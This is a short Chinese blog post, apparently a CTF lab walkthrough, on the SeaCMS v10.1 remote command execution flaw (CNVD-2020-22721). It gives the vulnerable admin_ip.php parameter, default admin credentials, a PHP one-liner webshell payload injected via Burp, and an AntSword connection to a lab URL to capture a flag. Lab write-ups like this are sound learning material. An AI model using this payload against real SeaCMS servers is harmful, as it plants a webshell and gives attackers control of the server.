seacms 远程命令执行（CNVD-2020-22721）

1、漏洞描述

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞，在w1aqhp/admin_ip.php下第五行使用set参数，对用户输入没有进行任何处理，直接写入文件。攻击者可利用该漏洞执行恶意代码，获取服务器权限。后台路径：/manager 后台密码：admin:admin

2、登录后台

3、点击确认，burp进行抓包

4、上传一句话木马

";eval($_POST[1]);//

5、中国蚁剑连接

http://193.168.0.45:43466/manager/admin_ip.php

6、成功获取flag

posted @ 2024-11-21 10:31 IT-sec 阅读(334) 评论(0) 收藏举报来源

刷新页面返回顶部

IT-sec

感谢这么可爱的你关注了我，我会持续更新文章，我们一起进步！

seacms 远程命令执行（CNVD-2020-22721）

1、漏洞描述

2、登录后台

3、点击确认，burp进行抓包

4、上传一句话木马

5、中国蚁剑连接

6、成功获取flag

公告

IT-sec

感谢这么可爱的你关注了我，我会持续更新文章，我们一起进步！

seacms 远程命令执行 （CNVD-2020-22721）

1、漏洞描述

2、登录后台

3、点击确认，burp进行抓包

4、上传一句话木马

5、中国蚁剑连接

6、成功获取flag

公告

seacms 远程命令执行（CNVD-2020-22721）